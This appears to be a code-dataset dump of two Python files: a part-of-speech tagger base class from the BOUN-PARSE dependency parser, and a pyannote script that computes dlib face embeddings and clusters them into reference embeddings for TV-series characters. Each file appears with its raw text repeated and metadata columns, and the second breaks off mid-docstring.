| en | 0.824623 | # Generated by Django 3.1.4 on 2021-01-23 16:14 | 1.42617 | 1 |
Parser-hybrid/nparser/neural/models/nlp/taggers/base_tagger.py | sb-b/BOUN-PARSE | 12 | 6616655 | <reponame>sb-b/BOUN-PARSE<filename>Parser-hybrid/nparser/neural/models/nlp/taggers/base_tagger.py
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright 2016 <NAME>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys
import re
import codecs
import numpy as np
import tensorflow as tf
import matplotlib.pyplot as plt
from nparser.misc.colors import ctext, color_pattern
from nparser.neural.models.nn import NN
#***************************************************************
class BaseTagger(NN):
""" """
PAD = 0
ROOT = 1
#=============================================================
def __call__(self, vocabs, moving_params=None):
""" """
self.moving_params = moving_params
if isinstance(vocabs, dict):
self.vocabs = vocabs
else:
self.vocabs = {vocab.name: vocab for vocab in vocabs}
input_vocabs = [self.vocabs[name] for name in self.input_vocabs]
embed = self.embed_concat(input_vocabs)
for vocab in list(self.vocabs.values()):
if vocab not in input_vocabs:
vocab.generate_placeholder()
placeholder = self.vocabs['words'].placeholder
if len(placeholder.get_shape().as_list()) == 3:
placeholder = placeholder[:,:,0]
self._tokens_to_keep = tf.to_float(tf.greater(placeholder, self.ROOT))
self._batch_size = tf.shape(placeholder)[0]
self._bucket_size = tf.shape(placeholder)[1]
self._sequence_lengths = tf.reduce_sum(tf.to_int32(tf.greater(placeholder, self.PAD)), axis=1)
self._n_tokens = tf.to_int32(tf.reduce_sum(self.tokens_to_keep))
top_recur = embed
for i in range(self.n_layers):
with tf.variable_scope('RNN%d' % i):
top_recur, _ = self.RNN(top_recur, self.recur_size)
return top_recur
#=============================================================
def process_accumulators(self, accumulators, time=None):
""" """
n_tokens, n_seqs, loss, corr, seq_corr = accumulators
acc_dict = {
'Loss': loss,
'TS': corr/n_tokens*100,
'SS': seq_corr/n_seqs*100,
}
if time is not None:
acc_dict.update({
'Token_rate': n_tokens / time,
'Seq_rate': n_seqs / time,
})
return acc_dict
#=============================================================
def update_history(self, history, accumulators):
""" """
acc_dict = self.process_accumulators(accumulators)
for key, value in acc_dict.items():
history[key].append(value)
return history['TS'][-1]
#=============================================================
def print_accuracy(self, accumulators, time, prefix='Train'):
""" """
acc_dict = self.process_accumulators(accumulators, time=time)
strings = []
strings.append(color_pattern('Loss:', '{Loss:7.3f}', 'bright_red'))
strings.append(color_pattern('TS:', '{TS:5.2f}%', 'bright_cyan'))
strings.append(color_pattern('SS:', '{SS:5.2f}%', 'bright_green'))
strings.append(color_pattern('Speed:', '{Seq_rate:6.1f} seqs/sec', 'bright_magenta'))
string = ctext('{0} ', 'bold') + ' | '.join(strings)
print(string.format(prefix, **acc_dict),file=sys.stderr)
return
#=============================================================
def plot(self, history, prefix='Train'):
""" """
pass
#=============================================================
def check(self, preds, sents, fileobj):
""" """
for tokens, preds in zip(sents, preds[0]):
for token, pred in zip(list(zip(*tokens)), preds):
tag = self.vocabs['tags'][pred]
fileobj.write('\t'.join(token+(tag, ))+'\n')
fileobj.write('\n')
return
#=============================================================
def write_probs(self, sents, output_file, probs, inv_idxs, metadata):
""" """
# Turns list of tuples of tensors into list of matrices
tag_probs = [tag_prob for batch in probs for tag_prob in batch[0]]
tokens_to_keep = [weight for batch in probs for weight in batch[1]]
tokens = [sent for batch in sents for sent in batch]
with codecs.open(output_file, 'w', encoding='utf-8', errors='ignore') as f:
for meta_idx,i in enumerate(inv_idxs):
sent, tag_prob, weights = tokens[i], tag_probs[i], tokens_to_keep[i]
sent = list(zip(*sent))
tag_preds = np.argmax(tag_prob, axis=1)
sent_meta=metadata[meta_idx]
if sent_meta["comments"]:
f.write("\n".join(sent_meta["comments"]))
f.write("\n")
for tok_idx,(token, tag_pred, weight) in enumerate(zip(sent, tag_preds[1:], weights[1:])):
for b,e in metadata["multiwordtokens"]:
if tok_idx+1==b: #there goes a multiword right here!
f.write("{}-{}".format(b,e))
f.write("\t_"*9)
f.write("\n")
token = list(token)
token.insert(5, sent_meta["feats"][tok_idx])
token.append('_')
token.append(sent_meta["miscfield"][tok_idx])
token[3] = self.vocabs['tags'][tag_pred]
f.write('\t'.join(token)+'\n')
if sent:
f.write('\n')
return
#=============================================================
@property
def train_keys(self):
return ('n_tokens', 'n_seqs', 'loss', 'n_correct', 'n_seqs_correct')
#=============================================================
@property
def valid_keys(self):
return ('preds', )
#=============================================================
@property
def parse_keys(self):
return ('probs', 'tokens_to_keep')
| #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright 2016 <NAME>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys
import re
import codecs
import numpy as np
import tensorflow as tf
import matplotlib.pyplot as plt
from nparser.misc.colors import ctext, color_pattern
from nparser.neural.models.nn import NN
#***************************************************************
class BaseTagger(NN):
""" """
PAD = 0
ROOT = 1
#=============================================================
def __call__(self, vocabs, moving_params=None):
""" """
self.moving_params = moving_params
if isinstance(vocabs, dict):
self.vocabs = vocabs
else:
self.vocabs = {vocab.name: vocab for vocab in vocabs}
input_vocabs = [self.vocabs[name] for name in self.input_vocabs]
embed = self.embed_concat(input_vocabs)
for vocab in list(self.vocabs.values()):
if vocab not in input_vocabs:
vocab.generate_placeholder()
placeholder = self.vocabs['words'].placeholder
if len(placeholder.get_shape().as_list()) == 3:
placeholder = placeholder[:,:,0]
self._tokens_to_keep = tf.to_float(tf.greater(placeholder, self.ROOT))
self._batch_size = tf.shape(placeholder)[0]
self._bucket_size = tf.shape(placeholder)[1]
self._sequence_lengths = tf.reduce_sum(tf.to_int32(tf.greater(placeholder, self.PAD)), axis=1)
self._n_tokens = tf.to_int32(tf.reduce_sum(self.tokens_to_keep))
top_recur = embed
for i in range(self.n_layers):
with tf.variable_scope('RNN%d' % i):
top_recur, _ = self.RNN(top_recur, self.recur_size)
return top_recur
#=============================================================
def process_accumulators(self, accumulators, time=None):
""" """
n_tokens, n_seqs, loss, corr, seq_corr = accumulators
acc_dict = {
'Loss': loss,
'TS': corr/n_tokens*100,
'SS': seq_corr/n_seqs*100,
}
if time is not None:
acc_dict.update({
'Token_rate': n_tokens / time,
'Seq_rate': n_seqs / time,
})
return acc_dict
#=============================================================
def update_history(self, history, accumulators):
""" """
acc_dict = self.process_accumulators(accumulators)
for key, value in acc_dict.items():
history[key].append(value)
return history['TS'][-1]
#=============================================================
def print_accuracy(self, accumulators, time, prefix='Train'):
""" """
acc_dict = self.process_accumulators(accumulators, time=time)
strings = []
strings.append(color_pattern('Loss:', '{Loss:7.3f}', 'bright_red'))
strings.append(color_pattern('TS:', '{TS:5.2f}%', 'bright_cyan'))
strings.append(color_pattern('SS:', '{SS:5.2f}%', 'bright_green'))
strings.append(color_pattern('Speed:', '{Seq_rate:6.1f} seqs/sec', 'bright_magenta'))
string = ctext('{0} ', 'bold') + ' | '.join(strings)
print(string.format(prefix, **acc_dict),file=sys.stderr)
return
#=============================================================
def plot(self, history, prefix='Train'):
""" """
pass
#=============================================================
def check(self, preds, sents, fileobj):
""" """
for tokens, preds in zip(sents, preds[0]):
for token, pred in zip(list(zip(*tokens)), preds):
tag = self.vocabs['tags'][pred]
fileobj.write('\t'.join(token+(tag, ))+'\n')
fileobj.write('\n')
return
#=============================================================
def write_probs(self, sents, output_file, probs, inv_idxs, metadata):
""" """
# Turns list of tuples of tensors into list of matrices
tag_probs = [tag_prob for batch in probs for tag_prob in batch[0]]
tokens_to_keep = [weight for batch in probs for weight in batch[1]]
tokens = [sent for batch in sents for sent in batch]
with codecs.open(output_file, 'w', encoding='utf-8', errors='ignore') as f:
for meta_idx,i in enumerate(inv_idxs):
sent, tag_prob, weights = tokens[i], tag_probs[i], tokens_to_keep[i]
sent = list(zip(*sent))
tag_preds = np.argmax(tag_prob, axis=1)
sent_meta=metadata[meta_idx]
if sent_meta["comments"]:
f.write("\n".join(sent_meta["comments"]))
f.write("\n")
for tok_idx,(token, tag_pred, weight) in enumerate(zip(sent, tag_preds[1:], weights[1:])):
for b,e in metadata["multiwordtokens"]:
if tok_idx+1==b: #there goes a multiword right here!
f.write("{}-{}".format(b,e))
f.write("\t_"*9)
f.write("\n")
token = list(token)
token.insert(5, sent_meta["feats"][tok_idx])
token.append('_')
token.append(sent_meta["miscfield"][tok_idx])
token[3] = self.vocabs['tags'][tag_pred]
f.write('\t'.join(token)+'\n')
if sent:
f.write('\n')
return
#=============================================================
@property
def train_keys(self):
return ('n_tokens', 'n_seqs', 'loss', 'n_correct', 'n_seqs_correct')
#=============================================================
@property
def valid_keys(self):
return ('preds', )
#=============================================================
@property
def parse_keys(self):
return ('probs', 'tokens_to_keep') | en | 0.562647 | #!/usr/bin/env python # -*- coding: utf-8 -*- # Copyright 2016 <NAME> # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. #*************************************************************** #============================================================= #============================================================= #============================================================= #============================================================= #============================================================= #============================================================= #============================================================= # Turns list of tuples of tensors into list of matrices #there goes a multiword right here! #============================================================= #============================================================= #============================================================= | 2.405093 | 2 |
scripts/image_features.py | sharleynelefevre/pyannote-db-plumcot | 0 | 6616656 | #!/usr/bin/env python
# coding: utf-8
"""
Extracts features from images given IMDB-compliant JSON file,
described in `CONTRIBUTING.md` (scraped in `image_scraping`)
"""
# Dependencies
## core
import numpy as np
import os
import json
import warnings
from shutil import copyfile
## ML/image processing
import imageio
from pyannote.video import Face
from pyannote.video.utils.scale_frame import scale_up_bbox, rectangle_to_bbox
## clustering
from pyannote.core.utils.distance import cdist,pdist
from scipy.spatial.distance import squareform
from scipy.cluster.hierarchy import fcluster
from pyannote.core.utils.hierarchy import linkage,fcluster_auto
#Hyperparameters are defined in scripts/images.py
MODEL_NAME="dlib_face_recognition_resnet_model_v1"
DLIB_MODELS="/people/lerner/pyannote/pyannote-video/dlib-models"
DLIB_EMBEDDING=os.path.join(DLIB_MODELS,f"{MODEL_NAME}.dat")
DLIB_LANDMARKS=os.path.join(DLIB_MODELS,"shape_predictor_68_face_landmarks.dat")
DLIB_THRESHOLD=0.6#threshold for clustering, see https://github.com/davisking/dlib-models
MIN_IMAGES=5
EMBEDDING_DIM=128
EMBEDDING_DTYPE=('embeddings', 'float64', (EMBEDDING_DIM,))
BBOX_DTYPE=('bbox', 'float64', (4,))
CLUSTERING_THRESHOLD=DLIB_THRESHOLD#'auto'
CLUSTERING_METHOD='complete'
KEEP_IMAGE_TYPES={'still_frame'}
def extract_image(rgb,landmarks_model,embedding_model,output,
return_landmarks=False,return_embedding=False):
"""Facial features detection for an rgb image
Parameters
----------
rgb : np.array
RGB image to be processed
landmarks : str
Path to dlib's 68 facial landmarks predictor model.
embedding : str
Path to dlib's face embedding model.
output : str
Path to features result file (should end with `.npy`).
return_landmarks : bool
Whether to save landmarks. Defaults to False.
return_embedding : bool
Whether to save embedding. Defaults to False.
"""
face = Face(landmarks=landmarks_model,embedding=embedding_model)
faces=[]
frame_height=rgb.shape[0]
frame_width=rgb.shape[1]
for rectangle in face(rgb):
bbox=rectangle_to_bbox(rectangle,frame_width,frame_height)
result=(bbox,)
if return_landmarks or return_embedding:
landmarks = face.get_landmarks(rgb, rectangle)
if return_landmarks:
landmarks=parts_to_landmarks(landmarks,frame_width,frame_height)
result+=(landmarks,)
if return_embedding:
embedding = face.get_embedding(rgb, landmarks)
result+=(embedding,)
faces.append(result)
face_dtype=[BBOX_DTYPE]
if return_landmarks:
face_dtype+=[LANDMARKS_DTYPE]
if return_embedding:
face_dtype+=[EMBEDDING_DTYPE]
faces=np.array(
faces,
dtype=face_dtype
)
np.save(output,faces)
def image_to_output_path(image_path,MODEL_NAME):
dir_path,file_name=os.path.split(image_path)
file_uri=os.path.splitext(file_name)[0]
#HACK should not be necessary if images have been scrapped with a low enough MAX_FILE_NAME_LENGTH
if len(file_uri) > 128:
names,counter=file_uri.split(".")
names=names[:128]+"#trim#"
file_uri=f"{names}.{counter}"
output_path=os.path.join(dir_path,f"{MODEL_NAME}.{file_uri}.npy")
return output_path
def compute_features(image_jsons,MODEL_NAME,DLIB_LANDMARKS,DLIB_EMBEDDING):
grayscale=0
no_image=0
not_exists=0
for i,image_json in enumerate(image_jsons['allImages']):
print((
f"\rimage {i+1}/{image_jsons['totalImageCount']}."
),end=" ")
image_path=image_json.get("path")
if image_path is not None:
image_path=image_path[0]
if not os.path.exists(image_path):
not_exists+=1
continue
else:
rgb = imageio.imread(image_path)
if len(rgb.shape)==2:
grayscale+=1
continue#dlib doesn't handle grayscale images
else:
no_image+=1
continue
output_path=image_to_output_path(image_path,MODEL_NAME)
extract_image(rgb,landmarks_model=DLIB_LANDMARKS,embedding_model=DLIB_EMBEDDING,output=output_path,
return_landmarks=False,return_embedding=True)
#update features path per image
image_jsons['allImages'][i]["features"]=[output_path]
for image_path in image_json['path'][1:]:
other_output_path=image_to_output_path(image_path,MODEL_NAME)
copyfile(output_path,other_output_path)
image_jsons['allImages'][i]["features"].append(other_output_path)
#update features path per character
feature_object={
"path":output_path,
"model_name":MODEL_NAME,
"imageType":image_json['imageType']
}
characters=image_json['label']
for character in characters:
if "features" in image_jsons['characters'][character]:
image_jsons['characters'][character]["features"].append(feature_object)
else:
image_jsons['characters'][character]["features"]=[feature_object]
print((
f"\nThere are {grayscale} grayscale images over {image_jsons['totalImageCount']-no_image-not_exists}.\n"
f"Over {image_jsons['totalImageCount']} images, {not_exists} do not exist "
f"and {no_image} were never scraped because of a lack of labelling."
))
return image_jsons
def compute_reference(character,t=0.6,method='complete',KEEP_IMAGE_TYPES=None,keep_faces=False):
"""
Cluster over features then save the biggest cluster as reference.
The file should be named like `<model_name>.<MIN_IMAGES>.<character_uri>.npy`.
It should contain one line per reference embedding.
Parameters:
-----------
character: dict
described in `CONTRIBUTING.md`, it contains the path towards precomputed features.
t: float, str, optional
Threshold to apply when forming flat clusters.
If 'auto' (case-sensitive) then we use pyannote.core.utils.hierarchy.fcluster_auto
to automatically determine the threshold
Defaults to 0.6 because of dlib (see https://github.com/davisking/dlib-models)
method: str, optional
Method used to calculate the distance between the
newly formed cluster :math:`u` and each :math:`v`
see scipy.cluster.hierarchy.linkage
KEEP_IMAGE_TYPES: set, optional
Restricts the cluster to features which were computed on a given imageType (e.g. 'still_frame')
See `CONTRIBUTING.md`
Defaults to keep all features (i.e. None)
keep_faces: bool, optional
keep track of rgb image of faces (cropped with the bounding box) for debugging and visualization
Returns:
--------
references: numpy array,
contains one embedding per line
faces: list, optional
a list of all faces in the character images
Returns only if keep_faces
"""
features=[]
if keep_faces:
faces=[]
for feature_object,image_file in zip(character['features'],character['paths']):
if KEEP_IMAGE_TYPES is not None:
if feature_object['imageType'] not in KEEP_IMAGE_TYPES:
continue
if keep_faces:
rgb=imageio.imread(image_file)
frame_height=rgb.shape[0]
frame_width=rgb.shape[1]
for feature in np.load(feature_object['path']):#this way we skip those that are empty (because no (frontal) face was detected)
features.append(feature["embeddings"])
if keep_faces:
left, top, right, bottom=scale_up_bbox(feature["bbox"],frame_width,frame_height)
faces.append(rgb[top:bottom,left:right])
if len(features) < 2:
return None
features=np.vstack(features)
#clustering
Z=linkage(features,method=method, metric='euclidean')
if t == 'auto':
clustering=fcluster_auto(features,Z, metric='euclidean')
else:
clustering=fcluster(Z,t,criterion='distance')
unique, counts = np.unique(clustering, return_counts=True)
biggest_cluster=unique[np.argmax(counts)]
references_i=np.where(clustering==biggest_cluster)[0]
references=features[references_i]
if keep_faces:
return references,faces
return references
def compute_references(image_jsons,IMAGE_PATH,t=0.6,method='complete',KEEP_IMAGE_TYPES=None,keep_faces=False):
"""
Clusters over every image in image_jsons
then assigns to every cluster the most recurring label in the caption
Starts with the biggest clusters first
Parameters:
-----------
image_jsons: dict
described in `CONTRIBUTING.md`, it contains the path towards precomputed features for every character
t: float, str, optional
Threshold to apply when forming flat clusters.
If 'auto' (case-sensitive) then we use pyannote.core.utils.hierarchy.fcluster_auto
to automatically determine the threshold
Defaults to 0.6 because of dlib (see https://github.com/davisking/dlib-models)
method: str, optional
Method used to calculate the distance between the
newly formed cluster :math:`u` and each :math:`v`
see scipy.cluster.hierarchy.linkage
KEEP_IMAGE_TYPES: set, optional
Restricts the cluster to features which were computed on a given imageType (e.g. 'still_frame')
See `CONTRIBUTING.md`
Defaults to keep all features (i.e. None)
keep_faces: bool, optional
keep track of rgb image of faces (cropped with the bounding box)
for debugging and visualization.
Heavy in memory.
Defaults to False.
Returns:
--------
image_jsons: dict
updated database with the path towards the reference embedding
"""
features=[]
save_labels=[]
if keep_faces:
import matplotlib.pyplot as plt
faces=[]
#Clusters over every image in image_jsons
for i,image in enumerate(image_jsons['allImages']):
print((
f"\rimage {i+1}/{image_jsons['totalImageCount']}."
),end=" ")
if 'features' not in image:
continue
if KEEP_IMAGE_TYPES is not None:
if image['imageType'] not in KEEP_IMAGE_TYPES:
continue
if keep_faces:
rgb=imageio.imread(image['path'][0])
frame_height=rgb.shape[0]
frame_width=rgb.shape[1]
for feature in np.load(image['features'][0]):#this way we skip those that are empty (because no (frontal) face was detected)
features.append(feature["embeddings"])
save_labels.append(image['label'])
if keep_faces:
left, top, right, bottom=scale_up_bbox(feature["bbox"],frame_width,frame_height)
faces.append(rgb[top:bottom,left:right])
features=np.vstack(features)
#clustering
Z=linkage(features,method=method, metric='euclidean')
if t == 'auto':
clustering=fcluster_auto(features,Z, metric='euclidean')
else:
clustering=fcluster(Z,t,criterion='distance')
unique, counts = np.unique(clustering, return_counts=True)
#assigns to every cluster the most recurring label in the caption
assigned_labels=[]
unassigned_clusters=[]
sorted_counts=np.sort(np.unique(counts))[::-1]
keep_centroid=[]
for count in sorted_counts:
for cluster in np.where(counts==count)[0]:#start with the biggest clusters
cluster_i=np.where(clustering==unique[cluster])[0]#get the indexes of the cluster
cluster_labels=np.array(save_labels)[cluster_i]#get the labels associated to the cluster
#flatten the labels
flat_cluster_labels = np.array([label for labels in cluster_labels for label in labels])
unique_labels, count_labels = np.unique(flat_cluster_labels, return_counts=True)
#assign the most reccuring label to the cluster
cluster_label=unique_labels[np.argmax(count_labels)]
#except if we already assigned it to a bigger cluster
if cluster_label in assigned_labels:
unassigned_clusters.append(cluster)
continue
#save reference and update image_jsons
str_KEEP_IMAGE_TYPES = ".".join(KEEP_IMAGE_TYPES) if KEEP_IMAGE_TYPES is not None else str(KEEP_IMAGE_TYPES)
output_path=os.path.join(IMAGE_PATH,cluster_label,f'{str_KEEP_IMAGE_TYPES}.{MODEL_NAME}.{cluster_label}.{method}.{t}.references.npy')
np.save(output_path,features[cluster_i])
if "references" in image_jsons['characters'][cluster_label]:
image_jsons['characters'][cluster_label]["references"].append(output_path)
else:
image_jsons['characters'][cluster_label]["references"]=[output_path]
assigned_labels.append(cluster_label)
if keep_faces:
distance_from_cluster=np.mean(squareform(pdist(features[cluster_i],metric='euclidean')),axis=0)
centroid_face=faces[cluster_i[np.argmin(distance_from_cluster)]]
keep_centroid.append(centroid_face)
print(f"assigned {len(assigned_labels)} labels over {len(unique)} clusters")
print(f"those cluster were not assigned any label :\n{unassigned_clusters}")
if keep_faces:
plt.figure(figsize=(16,16))
cols=int(np.sqrt(len(assigned_labels)))+1
for i,label in enumerate(assigned_labels):
plt.subplot(cols,cols,i+1)
plt.title(label[:12]+str(image_jsons['characters'][label]['count']))
centroid_path=os.path.join(IMAGE_PATH,label,
f'{str_KEEP_IMAGE_TYPES}.{MODEL_NAME}.{label}.{method}.{t}.centroid.png')
imageio.imwrite(centroid_path,keep_centroid[i])
image_jsons['characters'][label]["centroid"]=centroid_path
plt.axis('off')
plt.savefig(os.path.join(IMAGE_PATH,"centroids.png"))
return image_jsons
def compute_references_per_character(image_jsons,t=0.6,method='complete',MIN_IMAGES=1,KEEP_IMAGE_TYPES=None):
"""
Cluster over each character folder if it has at least `MIN_IMAGES` images features in it
then save the biggest cluster as the character reference.
The file should be named like `<model_name>.<MIN_IMAGES>.<character_uri>.npy`.
It should contain one line per reference embedding.
Parameters:
-----------
image_jsons: dict
described in `CONTRIBUTING.md`, it contains the path towards precomputed features for every character
t: float, str, optional
Threshold to apply when forming flat clusters.
If 'auto' (case-sensitive) then we use pyannote.core.utils.hierarchy.fcluster_auto
to automatically determine the threshold
Defaults to 0.6 because of dlib (see https://github.com/davisking/dlib-models)
method: str, optional
Method used to calculate the distance between the
newly formed cluster :math:`u` and each :math:`v`
see scipy.cluster.hierarchy.linkage
MIN_IMAGES: int, optional
compute the references embeddings of every character which has at least MIN_IMAGES.
Defaults to compute references for every character which has an image (i.e. 1)
KEEP_IMAGE_TYPES: set, optional
Restricts the cluster to features which were computed on a given imageType (e.g. 'still_frame')
See `CONTRIBUTING.md`
Defaults to keep all features (i.e. None)
Returns:
--------
image_jsons: dict
updated database with the path towards the reference embedding
"""
warnings.warn("This function has been deprecated in favor of compute_references")
n_characters=len(image_jsons['characters'])
for i,(name,character) in enumerate(image_jsons['characters'].items()):
print(f"\rprocessing {name} ({i}/{n_characters})",end=" ")
#using len(character['features']) instead of characer['count']
# as some images do not contain frontal face or are grayscale
if 'features' in character and len(character['features'])>=MIN_IMAGES:
references=compute_reference(character,t,method,KEEP_IMAGE_TYPES,keep_faces=False)
str_KEEP_IMAGE_TYPES = ".".join(KEEP_IMAGE_TYPES) if KEEP_IMAGE_TYPES is not None else str(KEEP_IMAGE_TYPES)
output_path=os.path.join(IMAGE_PATH,name,f'{str_KEEP_IMAGE_TYPES}.{MODEL_NAME}.{name}.{method}.references.npy')
np.save(output_path,references)
if "references" in character:
image_jsons['characters'][name]["references"].append(output_path)
else:
image_jsons['characters'][name]["references"]=[output_path]
return image_jsons
def main(image_jsons,IMAGE_PATH):
image_jsons=compute_features(image_jsons,MODEL_NAME,DLIB_LANDMARKS,DLIB_EMBEDDING)
with open(os.path.join(IMAGE_PATH,"images.json"),"w") as file:
json.dump(image_jsons,file)
image_jsons=compute_references(image_jsons,IMAGE_PATH,CLUSTERING_THRESHOLD,CLUSTERING_METHOD,KEEP_IMAGE_TYPES,keep_faces=True)
print("\ndone computing features and references ;)")
return image_jsons
if __name__ == '__main__':
with open(os.path.join(IMAGE_PATH,"images.json"),"r") as file:
image_jsons=json.load(file)
image_jsons=main(image_jsons,IMAGE_PATH)
with open(os.path.join(IMAGE_PATH,"images.json"),"w") as file:
json.dump(image_jsons,file)
| #!/usr/bin/env python
# coding: utf-8
"""
Extracts features from images given IMDB-compliant JSON file,
described in `CONTRIBUTING.md` (scraped in `image_scraping`)
"""
# Dependencies
## core
import numpy as np
import os
import json
import warnings
from shutil import copyfile
## ML/image processing
import imageio
from pyannote.video import Face
from pyannote.video.utils.scale_frame import scale_up_bbox, rectangle_to_bbox
## clustering
from pyannote.core.utils.distance import cdist,pdist
from scipy.spatial.distance import squareform
from scipy.cluster.hierarchy import fcluster
from pyannote.core.utils.hierarchy import linkage,fcluster_auto
#Hyperparameters are defined in scripts/images.py
MODEL_NAME="dlib_face_recognition_resnet_model_v1"
DLIB_MODELS="/people/lerner/pyannote/pyannote-video/dlib-models"
DLIB_EMBEDDING=os.path.join(DLIB_MODELS,f"{MODEL_NAME}.dat")
DLIB_LANDMARKS=os.path.join(DLIB_MODELS,"shape_predictor_68_face_landmarks.dat")
DLIB_THRESHOLD=0.6#threshold for clustering, see https://github.com/davisking/dlib-models
MIN_IMAGES=5
EMBEDDING_DIM=128
EMBEDDING_DTYPE=('embeddings', 'float64', (EMBEDDING_DIM,))
BBOX_DTYPE=('bbox', 'float64', (4,))
CLUSTERING_THRESHOLD=DLIB_THRESHOLD#'auto'
CLUSTERING_METHOD='complete'
KEEP_IMAGE_TYPES={'still_frame'}
def extract_image(rgb,landmarks_model,embedding_model,output,
return_landmarks=False,return_embedding=False):
"""Facial features detection for an rgb image
Parameters
----------
rgb : np.array
RGB image to be processed
landmarks : str
Path to dlib's 68 facial landmarks predictor model.
embedding : str
Path to dlib's face embedding model.
output : str
Path to features result file (should end with `.npy`).
return_landmarks : bool
Whether to save landmarks. Defaults to False.
return_embedding : bool
Whether to save embedding. Defaults to False.
"""
face = Face(landmarks=landmarks_model,embedding=embedding_model)
faces=[]
frame_height=rgb.shape[0]
frame_width=rgb.shape[1]
for rectangle in face(rgb):
bbox=rectangle_to_bbox(rectangle,frame_width,frame_height)
result=(bbox,)
if return_landmarks or return_embedding:
landmarks = face.get_landmarks(rgb, rectangle)
if return_landmarks:
landmarks=parts_to_landmarks(landmarks,frame_width,frame_height)
result+=(landmarks,)
if return_embedding:
embedding = face.get_embedding(rgb, landmarks)
result+=(embedding,)
faces.append(result)
face_dtype=[BBOX_DTYPE]
if return_landmarks:
face_dtype+=[LANDMARKS_DTYPE]
if return_embedding:
face_dtype+=[EMBEDDING_DTYPE]
faces=np.array(
faces,
dtype=face_dtype
)
np.save(output,faces)
def image_to_output_path(image_path,MODEL_NAME):
dir_path,file_name=os.path.split(image_path)
file_uri=os.path.splitext(file_name)[0]
#HACK should not be necessary if images have been scrapped with a low enough MAX_FILE_NAME_LENGTH
if len(file_uri) > 128:
names,counter=file_uri.split(".")
names=names[:128]+"#trim#"
file_uri=f"{names}.{counter}"
output_path=os.path.join(dir_path,f"{MODEL_NAME}.{file_uri}.npy")
return output_path
def compute_features(image_jsons,MODEL_NAME,DLIB_LANDMARKS,DLIB_EMBEDDING):
grayscale=0
no_image=0
not_exists=0
for i,image_json in enumerate(image_jsons['allImages']):
print((
f"\rimage {i+1}/{image_jsons['totalImageCount']}."
),end=" ")
image_path=image_json.get("path")
if image_path is not None:
image_path=image_path[0]
if not os.path.exists(image_path):
not_exists+=1
continue
else:
rgb = imageio.imread(image_path)
if len(rgb.shape)==2:
grayscale+=1
continue#dlib doesn't handle grayscale images
else:
no_image+=1
continue
output_path=image_to_output_path(image_path,MODEL_NAME)
extract_image(rgb,landmarks_model=DLIB_LANDMARKS,embedding_model=DLIB_EMBEDDING,output=output_path,
return_landmarks=False,return_embedding=True)
#update features path per image
image_jsons['allImages'][i]["features"]=[output_path]
for image_path in image_json['path'][1:]:
other_output_path=image_to_output_path(image_path,MODEL_NAME)
copyfile(output_path,other_output_path)
image_jsons['allImages'][i]["features"].append(other_output_path)
#update features path per character
feature_object={
"path":output_path,
"model_name":MODEL_NAME,
"imageType":image_json['imageType']
}
characters=image_json['label']
for character in characters:
if "features" in image_jsons['characters'][character]:
image_jsons['characters'][character]["features"].append(feature_object)
else:
image_jsons['characters'][character]["features"]=[feature_object]
print((
f"\nThere are {grayscale} grayscale images over {image_jsons['totalImageCount']-no_image-not_exists}.\n"
f"Over {image_jsons['totalImageCount']} images, {not_exists} do not exist "
f"and {no_image} were never scraped because of a lack of labelling."
))
return image_jsons
def compute_reference(character,t=0.6,method='complete',KEEP_IMAGE_TYPES=None,keep_faces=False):
"""
Cluster over features then save the biggest cluster as reference.
The file should be named like `<model_name>.<MIN_IMAGES>.<character_uri>.npy`.
It should contain one line per reference embedding.
Parameters:
-----------
character: dict
described in `CONTRIBUTING.md`, it contains the path towards precomputed features.
t: float, str, optional
Threshold to apply when forming flat clusters.
If 'auto' (case-sensitive) then we use pyannote.core.utils.hierarchy.fcluster_auto
to automatically determine the threshold
Defaults to 0.6 because of dlib (see https://github.com/davisking/dlib-models)
method: str, optional
Method used to calculate the distance between the
newly formed cluster :math:`u` and each :math:`v`
see scipy.cluster.hierarchy.linkage
KEEP_IMAGE_TYPES: set, optional
Restricts the cluster to features which were computed on a given imageType (e.g. 'still_frame')
See `CONTRIBUTING.md`
Defaults to keep all features (i.e. None)
keep_faces: bool, optional
keep track of rgb image of faces (cropped with the bounding box) for debugging and visualization
Returns:
--------
references: numpy array,
contains one embedding per line
faces: list, optional
a list of all faces in the character images
Returns only if keep_faces
"""
features=[]
if keep_faces:
faces=[]
for feature_object,image_file in zip(character['features'],character['paths']):
if KEEP_IMAGE_TYPES is not None:
if feature_object['imageType'] not in KEEP_IMAGE_TYPES:
continue
if keep_faces:
rgb=imageio.imread(image_file)
frame_height=rgb.shape[0]
frame_width=rgb.shape[1]
for feature in np.load(feature_object['path']):#this way we skip those that are empty (because no (frontal) face was detected)
features.append(feature["embeddings"])
if keep_faces:
left, top, right, bottom=scale_up_bbox(feature["bbox"],frame_width,frame_height)
faces.append(rgb[top:bottom,left:right])
if len(features) < 2:
return None
features=np.vstack(features)
#clustering
Z=linkage(features,method=method, metric='euclidean')
if t == 'auto':
clustering=fcluster_auto(features,Z, metric='euclidean')
else:
clustering=fcluster(Z,t,criterion='distance')
unique, counts = np.unique(clustering, return_counts=True)
biggest_cluster=unique[np.argmax(counts)]
references_i=np.where(clustering==biggest_cluster)[0]
references=features[references_i]
if keep_faces:
return references,faces
return references
def compute_references(image_jsons,IMAGE_PATH,t=0.6,method='complete',KEEP_IMAGE_TYPES=None,keep_faces=False):
"""
Clusters over every image in image_jsons
